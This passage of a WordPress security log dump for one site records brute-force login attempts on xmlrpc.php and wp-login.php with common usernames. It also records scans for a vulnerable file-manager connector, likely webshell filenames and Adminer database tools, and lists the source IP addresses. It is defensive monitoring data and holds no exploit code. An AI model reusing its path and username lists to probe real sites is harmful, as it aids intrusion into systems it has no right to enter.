.6142,152,'pcWAXVtHOhv9KGmaIYi8bsgP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.175.217.71',1118820679,'wwwadmin',0,1665660073.0645,152,'4gUxcjBTKLnXR2irDmvf7YaH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'admin',0,1665660717.0071,152,'7eUvnAKQHWz3RPf5h4gNTayl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.145.140',1208586636,'admin',0,1665660845.2291,152,'hT8eqyzxBbkI57CPR6DNOgQr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.105.29.21',778640661,'newd',0,1665661201.7066,7,'bIfLcpjT7GXJMz9S8qHmKu1o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.241.115.107',2733732715,'admin',0,1665661266.7836,152,'Rj9lenIsY3Lazv5MAXQbPWxk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.35.64.73',1730363465,'newd',0,1665661847.0036,152,'wQunXaBf0RyLg1Kz7WxE46NV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.212.34.36',3168018980,'newd',0,1665661996.7412,152,'Wd31DCfNSYms58e9RIbHjc6t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.223.203',3091980235,'joyce',0,1665662002.7588,152,'mjUBuCrG3EyhFoKXnfLtDgJ0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.235.194.70',401326662,'newd',0,1665662433.0274,152,'erBm3d28FY4gGAZ1UwqO0HK7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.142.146',1138658962,'newd',0,1665662433.0269,152,'n4YmvKVeGqojQApyMDU6x7Wg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.51.34',1218917154,'newd',0,1665662433.0279,152,'UZvY1MLtxCRdjzTqPFrNaXnG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'newd',0,1665662433.2286,152,'UHbzCSVKOy28f63FQDIq9LEm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.34.62.119',1210203767,'newd',0,1665664957.0938,152,'ETw8drx0Si4ah56PpobegtZ1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'newd',0,1665665093.1542,152,'3WNgSLQHRDqwhoz652tMfV9x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.227.237.232',1139011048,'newd',0,1665665101.1089,152,'hMW6yclOEdusv4R0bt1x7qVa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'newd',0,1665665122.8698,152,'bnikS7myv4soYQ3pX5x9wHzl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.31.21.26',2065634586,'newd',0,1665665408.9472,152,'Jpk7H6KU0TWPineoMzL1dhst','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.59.243.31',2453402399,'',0,1665665550.8528,55,'KpkSruo4JeNb5QGWRFgi7j0E','','19|0|0|0|cteisys.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('173.212.197.26',2916402458,'newd',0,1665665568.7517,152,'V1XtzqoD2pQfy3FJ8OnYvGL0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.88.73.86',3495446870,'newd',0,1665665863.2651,152,'sipOD8MXFYuNcCbwJP7nr562','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.86.9',1735284233,'newd',0,1665665863.2697,152,'PHgtNO3Iyjlx6dR5SKnovrp0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665665863.3122,152,'OuoKEfvmTG3q6VYD8XQCd7Hn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('90.156.169.18',1520216338,'newd',0,1665665867.7897,152,'h37dXaAgxV9srNRIJMvKmntE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.77.159.5',3494747909,'newd',0,1665665868.3240,152,'aN2nw8l30QBGxTo7MKqLv5WO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.88.73.86',3495446870,'newd',0,1665665871.8040,152,'da4IpUwQxOeCEWfP8jTSbkhY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665665879.9326,152,'aHg1N4Xn3quGeBsdmIVWtLxR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.26.178.66',874164802,'newd',0,1665665886.1339,152,'BvLMnKt4OmEs6gwC8NVGuqjA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.103.185',1806985145,'wwwadmin',0,1665668947.2387,152,'McjWTu6vL701xZglYeIBsQo3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('42.200.109.156',717778332,'wwwadmin',0,1665669075.9884,152,'J3eUIGcpAVkmEd2NCbzsQxur','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('182.18.144.189',3054670013,'newd',0,1665672442.3350,152,'AuqK6nXbIEcfmo4GrUO189Fx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.5.116.247',3271914743,'newd',0,1665672453.6451,152,'bnZwxFCOh09zqRtWI7Ve1Yfg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.127.114',2335932274,'newd',0,1665672457.7035,152,'VXE5yl8R30DreqOoxZQzbIpt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.112.145.178',3111162290,'newd',0,1665674717.7641,152,'ESP8ei1ML9Qh2VKRkwCXUF6y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.85.103',1386567015,'newd',0,1665674724.5680,152,'m9ib5vwBtVGhN24dIFQMzqcn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'newd',0,1665677423.5268,152,'WjSpZLleQRuCMBgyK1xz6ms7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'newd',0,1665677440.2407,152,'FBtjngO42fJsqCEVh3ZQvDTp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.221',1364735197,'newd',0,1665678507.0451,7,'dRf2BmVSQuUt5jJiaA3k0xNs','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.36.182.160',908375712,'newd',0,1665679389.3416,7,'KykAeMjVXdZNtUCJRfmBiPHx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('123.56.5.185',2067269049,'newd',0,1665680935.1580,152,'xYGt2gqIZ1PdXjOLUaoMw4u6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.78.198.205',575588045,'newd',0,1665681775.1355,7,'IZkVu3CsTlb0gJj5AEiFGYhr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('154.197.48.10',2596614154,'newd',0,1665682847.0461,152,'HzJkC4p8wiEosT0ePnhOxKqX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.28',1386567196,'newd',0,1665682847.1046,152,'KlaEN8y6hfO4er97IbGFYxQM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.38.88.250',3324401914,'newd',0,1665682847.3019,152,'Z28clW49Q7wGtFETHLeI6KR0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665682856.7023,152,'XNYd2ywecRmao40lWnPKJ86u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.134.248.249',1535572217,'newd',0,1665682857.4292,152,'xlvImYw87FhJ0unAXObKMB1C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.81.72',1386565960,'newd',0,1665682863.5124,152,'Let5hlUR3I1PB4YyGdqC6SpN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.184.215.230',532207590,'newd',0,1665682869.9672,152,'Bo2m3vaZyJi7GejXMCtUAgx1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665682874.4455,152,'sRpKj5J9mPOwyzXLT3Q0Itfr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.51.188.22',3107175446,'newd',0,1665682875.3718,152,'qcz9P8DLdE62rZCeXvmBMKIf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.145.125.175',579960239,'newd',0,1665682881.3416,152,'OMpKQebAz3mDxFvZa4YE6huH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.52.186.8',1211415048,'newd',0,1665682884.5789,152,'ou6yVCeJ5AEGPT4rHhjU80FY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.78.160.53',1934532661,'newd',0,1665682898.9969,152,'qHi7hwCXY2cDuPLMj5WlNSra','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.114.72.18',796018706,'newd',0,1665683225.3358,7,'l8BH9szhwfJOivy2mAnqp5oC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.46.81.43',3324924203,'newd',0,1665687064.8759,152,'F407pVYjrEJObIy5tidDl1An','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('135.181.119.15',2276816655,'newd',0,1665687067.7712,152,'z3QPkai0NCAUfOyX19GBer4n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.225.161.250',1138860538,'newd',0,1665687068.8010,152,'9phTtJW1c7a2zjb80Rd3sS4Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.70.114.151',3242619543,'newd',0,1665687081.0008,152,'lzsom8t7NiXLS60PGEQYDapr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('59.106.13.177',996806065,'newd',0,1665687083.6182,152,'xya4H9bG8c2zYwU0fVJpXkKq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.145.125.175',579960239,'newd',0,1665687095.6952,152,'drDyMVTWqslEYhL7b9QejzFB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.88.73.86',3495446870,'newd',0,1665687096.0812,152,'5mOWZSiP6EIFQ3A2nDdgVpoU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.127.114',2335932274,'newd',0,1665687576.2756,152,'nsWRoKtM7NzCODYZVu9r4qjL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'newd',0,1665687576.9374,152,'0Capfce8mbt3wiX4YFqrULvh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.202.169.54',600484150,'newd',0,1665687580.3412,152,'xtWOwK4DdcL73ZIfNaXSqGeM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665687587.4209,152,'qaWr3elOuCNk8dbEL1DTgJhm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.68.16.246',574886134,'newd',0,1665688968.2977,152,'xuXjGqclSv4RkK0BrPmid7NA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.136.107.178',763915186,'newd',0,1665688969.9682,152,'5ji3dsmv1tlJMPAXoZCF6b20','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.31.79.2',773803778,'newd',0,1665688977.3589,152,'OBEJ1icpwvqbo4WMQNFnhP8K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('94.73.146.148',1581879956,'newd',0,1665688981.7851,152,'i9KUGfqcOvZ15nrwY0QEC7gH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665688991.2088,152,'elVTqrykntUPN98GxuJQoWmK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.154.185.122',1738193274,'newd',0,1665689004.1588,152,'kMsxG0h1jUnWy6oJbXcl4q78','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.56.247.161',2067330977,'newd',0,1665689008.1294,152,'0R6Kzs781VZgrDHLqJlSOyGb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.73.33.135',843653511,'newd',0,1665689010.0978,152,'uoRGmjZaxChrS4PO8ebY2LyQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.99.229.218',392422874,'newd',0,1665690172.6488,7,'jUvZTFPiVKRJq0n1YEWNbG2D','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.109.117',2673438069,'newd',0,1665691009.9411,7,'Bn4kYQAjHShPyI2qszVlXtmb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.64.121',2335916153,'newd',0,1665692419.9035,152,'de65IcxuBjqnT81PZJrsimMY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.114.64.93',2809282653,'newd',0,1665692427.5151,152,'IC6KbESsHeNkiWL1q52FyTjZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.96.110.35',1734372899,'newd',0,1665692431.1227,152,'bSi5yYsgcPKWG9BqHfLUNrIT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.78.79.85',2035175253,'newd',0,1665692440.0046,152,'yeK3GskibCO5D8jP1opmIfvd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.31.79.2',773803778,'newd',0,1665692448.8099,152,'Ew4v0NHOq2AS7t6F3LsWgafD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.143.92',2813103964,'newd',0,1665692449.6223,152,'yjKtYOF5cLQPxUTns4WMEHea','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.78.79.85',2035175253,'newd',0,1665692452.0524,152,'OVedtL8PnakFBYCN396v5KWH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.65.234.0',574745088,'newd',0,1665692489.7931,7,'Wzdvou4OqaQHN3K8T60kR7Jr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.94.207',2806472399,'',0,1665692847.1760,55,'n3X4QtrRCHZSbMpshgDeB8Tl','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('167.71.94.207',2806472399,'',0,1665692850.5237,55,'oyVkS0cXBQldmCiDjbTe5P72','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('134.19.179.131',2249438083,'Joyce',0,1665693154.2641,152,'DerNoWwJZzg4fAYKaRBhv0jx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.246.208',2650142416,'newd',0,1665693358.6307,7,'uKCcFQBqLp7de4DM3gXVr9wa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('42.193.106.55',717318711,'newd',0,1665697265.8328,152,'OGsK46hCLfUnTZkm7ebExqDI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.78.79.85',2035175253,'newd',0,1665697274.7178,152,'BLDO3VA9ysaS6K2Fd71xmkIt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.222.89',2261900889,'newd',0,1665697281.5668,152,'MOYdQpAn5hKTWPFybm2RZCqa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.128.32',1959428128,'newd',0,1665697284.1349,152,'bCEAmLRrHxwd21qSG7K9D4Ou','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.64.187.254',759217150,'newd',0,1665697284.9854,152,'7R2NO6y35rYEv8WsTmoqcX1f','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.47.206',861482958,'newd',0,1665698161.5046,7,'DCgGSPtE067OpdazvfKFN5lA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('84.39.116.180',1411871924,'Joyce',0,1665714252.1270,152,'cno9HFMNz6yp7fmxlbJEgOSi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.82.122',2335920762,'newd',0,1665714334.0892,7,'ezRP27A6MmnCVUSxZjgHWEws','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.64.82.118',3225440886,'newd',0,1665715246.5188,7,'7K64a2uIwsxm8Agk0BdPUjfv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.114.72.18',796018706,'newd',0,1665716780.9724,7,'m4Pn28A6wgstNobpcTzKCxDE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('193.70.114.151',3242619543,'mark',0,1665716868.9672,152,'YcGfhm1sbR9OXB2UP6Qp8INZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.88.73.86',3495446870,'admin',0,1665716871.2664,152,'4fc6HRi25ZgYLC9PuVo1QybU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.112.219',2522837211,'warrenshaw',0,1665717469.3216,152,'B8kisrYt1NVMZg4qoGuHFIhS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.64.187.254',759217150,'test',0,1665717469.3837,152,'UMukLTaIHFs1NrWRoSzc50qd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.176.79',1137553487,'testing',0,1665717470.1303,152,'Z7FzHpNn4MylQLGgh2ocf1Um','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.25.147.55',2014942007,'prova',0,1665717472.7976,152,'Weh5ynZoV0kJaxD6CK1l4rvX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.26.178.66',874164802,'gluetest',0,1665717493.3015,152,'3NYn19OdGqjFmlRaeyA5gpBD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.202.169.54',600484150,'Admin',0,1665717495.7894,152,'dtJYAz7Qu50EgrlZijXywVUv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.77.133',866078085,'orangganteng1',0,1665717498.4535,152,'dRLxcArY5FktoJIMh9gsfamC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.129.168.41',3112282153,'andrea',0,1665717503.6634,152,'EwMHDFctlenTh1moNbBUigRJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.92.169.121',2757536121,'HelloRDP123',0,1665717513.2700,152,'uTiqNRaft2bmePzQEw43hlVK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.255.81.60',872370492,'newd',0,1665717671.0945,7,'ZhscVoq6UmLbYxOzEIMrj0SQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.13.81.56',856510776,'jane',0,1665718870.2680,152,'mgZkrBcUi7wJELjpevC3lVn9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.163.7',3265504007,'kamrul562',0,1665718870.3006,152,'9so6khXwgxZBUvbYT3u0MjKi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.25.147.55',2014942007,'demo',0,1665718870.3821,152,'WGgTE74P5NwkQbznutD2fMAr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('135.181.119.15',2276816655,'gary',0,1665718882.1776,152,'Vdi5M62c7WEgt9ZoLu4myTxs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.114.64.93',2809282653,'admin',0,1665718883.5683,152,'zbxrIkmMvAQ6lZS9HYKDe2nd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'client',0,1665718887.7643,152,'NGBZbtOvcKzrCI7ou3pTSElW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'admin',0,1665718890.3943,152,'g3QyCdjsMDhLuZvBl7IEVG8w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.64.187.254',759217150,'admin',0,1665718892.9938,152,'bMLpkrneX9svh7I0TuSzdw5Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.87.109',1386567533,'admin',0,1665718909.4182,152,'RPnk3DSbOt7iT65ZqcrJMeVh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'admin',0,1665718913.6638,152,'O419qSi0Pcn8JUmK2yWdAtex','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.73.33.135',843653511,'frank',0,1665718920.6318,152,'XyQMF4uzetAJCUI3Ojrk75No','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.187.58.136',599472776,'newd',0,1665719238.8399,7,'ipSwAMcdNbfzYT08l7eERPUV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('92.204.55.20',1556887316,'',0,1665719823.2207,55,'XVs9oiPw0ezNZ4nacyk12OIp','','19|0|0|0|cteisys.com/years.php',0,19,0),('92.204.55.20',1556887316,'',0,1665719824.4919,55,'4iRjV9Q0OCqKzXudsgcJmPZN','','19|0|0|0|cteisys.com/years.php',0,19,0),('92.204.55.20',1556887316,'',0,1665719825.7797,55,'REWwcYAGhpfL6DumFXedjgUK','','19|0|0|0|cteisys.com/css/index.php',0,19,0),('92.204.55.20',1556887316,'',0,1665719827.0722,55,'EjHMLhRKbg5aA8yJ6c0VmP3v','','19|0|0|0|cteisys.com/css/index.php',0,19,0),('92.204.55.20',1556887316,'',0,1665719828.3508,55,'lHairANdGw3XsxCDz9JVbU7Q','','19|0|0|0|cteisys.com/css/contents.php',0,19,0),('92.204.55.20',1556887316,'',0,1665719828.3545,10,'lHairANdGw3XsxCDz9JVbU7Q','','707|0|0|0|cteisys.com/css/contents.php',0,707,0),('92.204.55.20',1556887316,'',0,1665719829.6436,18,'QRLBJaIv0CTop2w3kfENi8mq','','13|0|0|0|cteisys.com/css/contents.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719830.8461,100,'JpBnkK0RYU41AbjsiM62ytcC','','13|0|0|0|cteisys.com/contents.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719831.9582,18,'OkuTPy2SCZDXNBsadFh57xIM','','13|0|0|0|cteisys.com/contents.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719833.0706,100,'O6CAoqhYM7Z3ndj0rDJiBEtV','','13|0|0|0|cteisys.com/css/load.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719834.1931,18,'Mzeiox3sSF5d9uqL8g7fE1yZ','','13|0|0|0|cteisys.com/css/load.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719835.3357,100,'vKy5OzZ716Cx2Adl8Bts9IVY','','13|0|0|0|cteisys.com/votes.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719836.4554,18,'GrN9fyLTubDakEc1JAsxU4nR','','13|0|0|0|cteisys.com/votes.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719837.5499,100,'M50b2O84XyGhHgEKuNPpA7lS','','13|0|0|0|cteisys.com/2index.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719838.6386,18,'a2dNDX96wRHbmrqZgezFSL1M','','13|0|0|0|cteisys.com/2index.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719839.7423,100,'QmD6LvZSdVyb3K0R2znF1iot','','13|0|0|0|cteisys.com/1index.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719840.8439,18,'d5bWyD2vZpOrTAkhc1KBtL7q','','13|0|0|0|cteisys.com/1index.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719841.9940,100,'SVcyDKtfQx6zGCOakZ3N9PBX','','13|0|0|0|cteisys.com/',0,13,0),('92.204.55.20',1556887316,'',0,1665719843.1442,18,'3ZyMc091DHfbsvUO2xiGjEuo','','13|0|0|0|cteisys.com/',0,13,0),('92.204.55.20',1556887316,'',0,1665719844.2481,100,'FJgixuoGfsB5mXbQMrLZPpEw','','13|0|0|0|cteisys.com/load.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719845.4159,18,'Axs8vZ4cC675WPb0g2MrkfUa','','13|0|0|0|cteisys.com/load.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719846.6410,100,'4EChGtO5Ip7eqMQsrdcgfvHU','','13|0|0|0|cteisys.com/admin.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719847.8174,18,'TWIrDVjCd05UkBsXf37pJvKE','','13|0|0|0|cteisys.com/admin.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719849.0810,100,'kFPqCGnoRc98idz6MprSZ3Jt','','13|0|0|0|cteisys.com/wikindex.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719850.1554,18,'STixcp9roE4aMbtRLNUJkml2','','13|0|0|0|cteisys.com/wikindex.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719851.2421,71,'0hMeERArZBqkg5J3Q6t24HNV','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719851.2425,100,'0hMeERArZBqkg5J3Q6t24HNV','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719852.4873,71,'G8QsNgeqp9ouPaK0kyL4T5lc','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719852.4882,18,'G8QsNgeqp9ouPaK0kyL4T5lc','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719853.6826,100,'58vOQpuGcXzDeH6d0taYqwy1','','13|0|0|0|cteisys.com/css/votes.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719854.8922,18,'L5mr7QpT9ygiE4fY10slIvkw','','13|0|0|0|cteisys.com/css/votes.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719856.3082,100,'LxCaYH5gV9mftUhypu120wXq','','13|0|0|0|cteisys.com/about.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719857.4940,18,'YsoH8ZzriJGT3ednK7EaNLM5','','13|0|0|0|cteisys.com/about.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719858.7802,100,'N31Scr9buB8AynVfxwaRL7sP','','13|0|0|0|cteisys.com/radio.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719860.0848,18,'lTyZtbkrDpd3vaLjq7nNs4OA','','13|0|0|0|cteisys.com/radio.php',0,13,0),('92.204.55.20',1556887316,'',0,1665719861.7102,55,'wUV6QYp8BeqymcE52oGjMaI9','','19|0|0|0|cteisys.com/wp-queryall.php',0,19,0),('92.204.55.20',1556887316,'',0,1665719863.0612,55,'aBZ5TjpxG2coRWiJCYPlk7Xu','','19|0|0|0|cteisys.com/wp-static.php',0,19,0),('136.144.251.177',2291202993,'gast',0,1665722043.1439,152,'WAnQIETdiqgC81NMPrYDtK6F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'admin',0,1665722057.9222,152,'RTiQUXw3kSBmdjaPLbuO7E5M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.228.32.9',1122246665,'admin',0,1665722058.3144,152,'vo5zGfCLrBR09EbadHgciwhs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.78.160.53',1934532661,'test',0,1665722083.0191,152,'7gEkPw1c6GFyTRIzrfjbeA2B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('210.245.90.215',3539294935,'demo',0,1665722083.0199,152,'JHP7bj9zXNp0w3SuE4xisLmA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.75.130.25',860586521,'wordpress',0,1665722083.0872,152,'om2dxUQNOCcaBKi47qT1ZJIt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('156.67.211.101',2621690725,'manager',0,1665722090.1506,152,'VkfbgsiweO9ohBHaYvKzmFjl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('114.115.136.65',1920174145,'student1',0,1665722102.7246,152,'upwQAHSIBxc6kDdTPMezREGa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('183.90.250.15',3076192783,'doctor',0,1665722103.3218,152,'09tbJ5lKTouZAjr2XnvMGsLh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.243.212.221',351524061,'',0,1665722469.7684,55,'G059mXeQTwRgqbkav3UdtWOM','','19|0|0|0|cteisys.com/adminer.php',0,19,0),('20.243.212.221',351524061,'',0,1665722469.9399,55,'TVlr3yDCwGhMxgnXFbouNacY','','19|0|0|0|cteisys.com/mysql.php',0,19,0),('20.243.212.221',351524061,'',0,1665722470.7120,55,'0YjWF4NzEXGcLB6mrAfVIgM9','','19|0|0|0|cteisys.com/sql.php',0,19,0),('20.243.212.221',351524061,'',0,1665722471.4432,55,'b6ekTqNGz81KXAro0jhyOmEB','','19|0|0|0|cteisys.com/ad.php',0,19,0),('20.243.212.221',351524061,'',0,1665722472.2639,55,'yZ4rUk8cau7JhAtzlpvMmFjb','','19|0|0|0|cteisys.com/admin.php',0,19,0),('20.243.212.221',351524061,'',0,1665722472.2672,10,'yZ4rUk8cau7JhAtzlpvMmFjb','','707|0|0|0|cteisys.com/admin.php',0,707,0),('20.243.212.221',351524061,'',0,1665722473.0141,55,'vkH2Wz6Nxnqwg7PQMa5X9foC','','19|0|0|0|cteisys.com/adminer-4.2.5.php',0,19,0),('20.243.212.221',351524061,'',0,1665722473.7531,55,'IibTq9cQaeL3DOzSd27gjJk0','','19|0|0|0|cteisys.com/adminer-4.3.0.php',0,19,0),('20.243.212.221',351524061,'',0,1665722474.5371,55,'Yj1HB5SoatfM9gXxJ4l0iC3m','','19|0|0|0|cteisys.com/adminer-4.3.1.php',0,19,0),('20.243.212.221',351524061,'',0,1665722475.2816,55,'s9q2Am7MOFnzDperGvQHyTKb','','19|0|0|0|cteisys.com/adminer-4.4.0.php',0,19,0),('20.243.212.221',351524061,'',0,1665722476.0522,55,'NH64EBAOfYZomd3tbick5UF0','','19|0|0|0|cteisys.com/adminer-4.5.0.php',0,19,0),('20.243.